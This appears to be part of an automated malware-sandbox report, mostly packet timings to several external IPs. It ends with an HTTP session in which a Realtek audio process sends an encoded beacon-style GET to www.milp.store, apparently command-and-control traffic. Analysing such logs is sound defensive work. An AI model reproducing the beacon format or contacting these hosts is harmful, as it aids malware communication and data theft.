                                                                          Jan 9, 2025 16:48:44.345257044 CET804976147.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:48:44.345642090 CET4976180192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:48:44.346270084 CET4976180192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:48:44.659893036 CET804976147.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:48:49.515994072 CET4976280192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:48:49.652894974 CET804976276.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:48:49.653096914 CET4976280192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:48:49.659240007 CET4976280192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:48:49.795423031 CET804976276.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:48:49.795669079 CET804976276.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:48:49.795814991 CET4976280192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:48:51.161875963 CET4976280192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:48:52.177545071 CET4976380192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:48:52.314389944 CET804976376.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:48:52.314632893 CET4976380192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:48:52.318074942 CET4976380192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:48:52.453670979 CET804976376.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:48:52.453888893 CET804976376.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:48:52.454030991 CET4976380192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:48:53.833105087 CET4976380192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:48:54.850198030 CET4976480192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:48:54.987998962 CET804976476.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:48:54.988254070 CET4976480192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:48:54.994981050 CET4976480192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:48:54.995001078 CET4976480192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:48:55.131616116 CET804976476.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:48:55.132807970 CET804976476.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:48:55.133171082 CET804976476.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:48:55.135523081 CET804976476.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:48:55.135737896 CET4976480192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:48:56.504543066 CET4976480192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:48:57.521464109 CET4976580192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:48:57.658592939 CET804976576.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:48:57.658920050 CET4976580192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:48:57.663496971 CET4976580192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:48:57.803649902 CET804976576.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:48:57.803693056 CET804976576.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:48:57.804012060 CET4976580192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:48:57.804640055 CET4976580192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:48:57.940630913 CET804976576.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:49:03.276185989 CET4976680192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:49:04.283029079 CET4976680192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:49:05.613902092 CET8049766160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:05.613979101 CET8049766160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:05.614192009 CET4976680192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:49:05.620799065 CET4976680192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:49:05.969324112 CET8049766160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:05.970071077 CET8049766160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:05.970114946 CET8049766160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:05.970153093 CET8049766160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:05.970372915 CET4976680192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:49:07.127331972 CET4976680192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:49:08.144084930 CET4976780192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:49:08.494354010 CET8049767160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:08.494656086 CET4976780192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:49:08.501307964 CET4976780192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:49:08.851257086 CET8049767160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:08.852286100 CET8049767160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:08.852333069 CET8049767160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:08.852371931 CET8049767160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:08.852586031 CET4976780192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:49:10.017198086 CET4976780192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:49:11.032939911 CET4976880192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:49:11.386279106 CET8049768160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:11.386557102 CET4976880192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:49:11.394234896 CET4976880192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:49:11.394298077 CET4976880192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:49:11.747178078 CET8049768160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:11.747221947 CET8049768160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:11.747670889 CET8049768160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:11.747716904 CET8049768160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:11.747750998 CET8049768160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:11.747777939 CET8049768160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:11.747805119 CET8049768160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:11.747833967 CET8049768160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:11.747863054 CET4976880192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:49:12.100543976 CET8049768160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:13.929639101 CET4976980192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:49:14.276446104 CET8049769160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:14.276731968 CET4976980192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:49:14.279927015 CET4976980192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:49:14.626492023 CET8049769160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:14.627182007 CET8049769160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:14.627224922 CET8049769160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:14.627260923 CET8049769160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:14.627558947 CET4976980192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:49:14.628410101 CET4976980192.168.11.20160.25.166.123
                                                                          Jan 9, 2025 16:49:14.974793911 CET8049769160.25.166.123192.168.11.20
                                                                          Jan 9, 2025 16:49:19.790178061 CET4977080192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:49:19.908843040 CET8049770104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:49:19.909065962 CET4977080192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:49:19.912571907 CET4977080192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:49:20.031169891 CET8049770104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:49:20.045648098 CET8049770104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:49:20.046046972 CET8049770104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:49:20.046309948 CET4977080192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:49:21.421216965 CET4977080192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:49:22.437958956 CET4977180192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:49:22.557507992 CET8049771104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:49:22.557725906 CET4977180192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:49:22.564306974 CET4977180192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:49:22.683890104 CET8049771104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:49:22.705631018 CET8049771104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:49:22.705799103 CET8049771104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:49:22.706079960 CET4977180192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:49:24.076740026 CET4977180192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:49:25.093664885 CET4977280192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:49:25.212879896 CET8049772104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:49:25.213366985 CET4977280192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:49:25.216981888 CET4977280192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:49:25.217051029 CET4977280192.168.11.20104.21.13.141
                                                                          Jan 9, 2025 16:49:25.336482048 CET8049772104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:49:25.336693048 CET8049772104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:49:25.336934090 CET8049772104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:49:25.337244034 CET8049772104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:49:25.337285042 CET8049772104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:49:25.349929094 CET8049772104.21.13.141192.168.11.20
                                                                          Jan 9, 2025 16:51:12.329804897 CET4979680192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:51:12.475404024 CET8049796198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:51:12.475414991 CET8049796198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:51:12.475651979 CET4979680192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:51:13.834775925 CET4979680192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:51:14.852055073 CET4979780192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:51:14.994539022 CET8049797198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:51:14.994704962 CET4979780192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:51:15.001622915 CET4979780192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:51:15.001667976 CET4979780192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:51:15.144190073 CET8049797198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:51:15.144418001 CET8049797198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:51:15.144650936 CET8049797198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:51:15.144691944 CET8049797198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:51:15.145132065 CET8049797198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:51:15.147986889 CET8049797198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:51:15.148030996 CET8049797198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:51:15.148192883 CET4979780192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:51:16.506159067 CET4979780192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:51:17.522948980 CET4979880192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:51:17.665361881 CET8049798198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:51:17.665615082 CET4979880192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:51:17.670087099 CET4979880192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:51:17.815334082 CET8049798198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:51:17.815377951 CET8049798198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:51:17.815412045 CET8049798198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:51:17.815682888 CET4979880192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:51:17.816927910 CET4979880192.168.11.20198.58.118.167
                                                                          Jan 9, 2025 16:51:17.959017038 CET8049798198.58.118.167192.168.11.20
                                                                          Jan 9, 2025 16:51:22.833194971 CET4979980192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:22.951797009 CET8049799104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:22.951913118 CET4979980192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:22.958621025 CET4979980192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:23.077524900 CET8049799104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:23.504389048 CET8049799104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:23.504467964 CET8049799104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:23.504498005 CET8049799104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:23.504673004 CET4979980192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:23.504842997 CET8049799104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:23.504981041 CET4979980192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:24.473150969 CET4979980192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:25.489861012 CET4980080192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:25.609513044 CET8049800104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:25.609764099 CET4980080192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:25.615835905 CET4980080192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:25.735202074 CET8049800104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:26.157382965 CET8049800104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:26.157428026 CET8049800104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:26.157605886 CET4980080192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:26.157773972 CET8049800104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:26.157991886 CET4980080192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:27.128726959 CET4980080192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:28.145760059 CET4980180192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:28.264552116 CET8049801104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:28.264745951 CET4980180192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:28.271469116 CET4980180192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:28.271497011 CET4980180192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:28.271570921 CET4980180192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:28.390090942 CET8049801104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:28.390301943 CET8049801104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:28.390589952 CET8049801104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:28.390599966 CET8049801104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:28.390836000 CET8049801104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:28.855375051 CET8049801104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:28.855509043 CET8049801104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:28.855880976 CET4980180192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:28.856323957 CET8049801104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:28.856488943 CET4980180192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:29.784624100 CET4980180192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:30.800520897 CET4980280192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:30.919219971 CET8049802104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:30.919424057 CET4980280192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:30.923999071 CET4980280192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:31.042606115 CET8049802104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:31.459163904 CET8049802104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:31.459302902 CET8049802104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:31.459454060 CET4980280192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:31.460108995 CET8049802104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:31.460300922 CET4980280192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:31.461380005 CET4980280192.168.11.20104.21.96.1
                                                                          Jan 9, 2025 16:51:31.579725027 CET8049802104.21.96.1192.168.11.20
                                                                          Jan 9, 2025 16:51:36.472059965 CET4980380192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:51:36.644311905 CET8049803199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:51:36.644499063 CET4980380192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:51:36.651113033 CET4980380192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:51:36.823652029 CET8049803199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:51:36.843951941 CET8049803199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:51:36.843996048 CET8049803199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:51:36.844192028 CET4980380192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:51:38.157325029 CET4980380192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:51:39.174323082 CET4980480192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:51:39.347481966 CET8049804199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:51:39.347744942 CET4980480192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:51:39.351360083 CET4980480192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:51:39.524208069 CET8049804199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:51:39.544110060 CET8049804199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:51:39.544120073 CET8049804199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:51:39.544389963 CET4980480192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:51:40.860513926 CET4980480192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:51:41.877408028 CET4980580192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:51:42.049768925 CET8049805199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:51:42.049966097 CET4980580192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:51:42.056781054 CET4980580192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:51:42.056830883 CET4980580192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:51:42.056884050 CET4980580192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:51:42.229502916 CET8049805199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:51:42.229525089 CET8049805199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:51:42.229538918 CET8049805199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:51:42.229798079 CET8049805199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:51:42.254570007 CET8049805199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:51:42.254592896 CET8049805199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:51:42.254723072 CET4980580192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:51:43.562985897 CET4980580192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:51:44.579277992 CET4980680192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:51:44.752249956 CET8049806199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:51:44.752556086 CET4980680192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:51:44.757000923 CET4980680192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:51:44.929544926 CET8049806199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:51:44.941435099 CET8049806199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:51:44.941442966 CET8049806199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:51:44.941797972 CET4980680192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:51:44.943084955 CET4980680192.168.11.20199.192.21.169
                                                                          Jan 9, 2025 16:51:45.121125937 CET8049806199.192.21.169192.168.11.20
                                                                          Jan 9, 2025 16:51:58.123229027 CET4980780192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:51:58.433916092 CET804980747.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:51:58.434088945 CET4980780192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:51:58.437582970 CET4980780192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:51:58.748205900 CET804980747.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:51:59.430126905 CET804980747.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:51:59.430138111 CET804980747.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:51:59.430233002 CET4980780192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:51:59.950131893 CET4980780192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:52:00.967410088 CET4980880192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:52:01.266761065 CET804980847.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:52:01.267225981 CET4980880192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:52:01.270879030 CET4980880192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:52:01.569952011 CET804980847.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:52:02.291054010 CET804980847.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:52:02.291101933 CET804980847.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:52:02.291301012 CET4980880192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:52:02.777558088 CET4980880192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:52:03.794389009 CET4980980192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:52:04.103945971 CET804980947.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:52:04.104228973 CET4980980192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:52:04.110891104 CET4980980192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:52:04.110974073 CET4980980192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:52:04.420485973 CET804980947.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:52:04.420732975 CET804980947.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:52:04.420772076 CET804980947.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:52:04.420998096 CET804980947.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:52:04.421291113 CET804980947.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:52:04.421333075 CET804980947.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:52:05.101855993 CET804980947.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:52:05.101877928 CET804980947.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:52:05.102103949 CET4980980192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:52:05.620635033 CET4980980192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:52:06.636502028 CET4981080192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:52:06.947571039 CET804981047.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:52:06.947765112 CET4981080192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:52:06.955643892 CET4981080192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:52:07.266966105 CET804981047.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:52:07.952403069 CET804981047.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:52:07.952579975 CET804981047.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:52:07.952796936 CET4981080192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:52:07.953932047 CET4981080192.168.11.2047.83.1.90
                                                                          Jan 9, 2025 16:52:08.264956951 CET804981047.83.1.90192.168.11.20
                                                                          Jan 9, 2025 16:52:12.963181019 CET4981180192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:52:13.977304935 CET4981180192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:52:14.113631010 CET804981176.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:52:14.113818884 CET4981180192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:52:14.120506048 CET4981180192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:52:14.256603956 CET804981176.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:52:14.256620884 CET804981176.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:52:14.256757975 CET4981180192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:52:15.634244919 CET4981180192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:52:16.651340961 CET4981280192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:52:16.788973093 CET804981276.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:52:16.789169073 CET4981280192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:52:16.795026064 CET4981280192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:52:16.935161114 CET804981276.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:52:16.935261011 CET804981276.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:52:16.935494900 CET4981280192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:52:18.305488110 CET4981280192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:52:19.322474003 CET4981380192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:52:20.335258007 CET4981380192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:52:20.471267939 CET804981376.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:52:20.471568108 CET4981380192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:52:20.480328083 CET4981380192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:52:20.616453886 CET804981376.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:52:20.616612911 CET804981376.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:52:20.616692066 CET4981380192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:52:20.616764069 CET4981380192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:52:20.663352966 CET4981380192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:52:20.752707005 CET804981376.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:52:20.752722979 CET804981376.223.54.146192.168.11.20
                                                                          Jan 9, 2025 16:52:20.752897024 CET4981380192.168.11.2076.223.54.146
                                                                          Jan 9, 2025 16:52:21.992404938 CET4981380192.168.11.2076.223.54.146
                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          0 | 192.168.11.20 | 49745 | 194.9.94.85 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:47:27.697716951 CET | 528 | OUT | GET /js1x/?LSbaT=zft4LoBw&lV=YzadGC6YqOgjY/9qwmEESxfA+8MKCZxp0CcLO+Xh8dJmB8CdhvgUA7hRZF2xLQJtMCWb5Kgxi+xGIwqq0R102ShiT2rp0EsU7QKswMKkfsup8/2EYKLr6Ec= HTTP/1.1
                                                                          Host: www.milp.store
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:47:27.946897030 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Thu, 09 Jan 2025 15:47:27 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          X-Powered-By: PHP/8.1.30
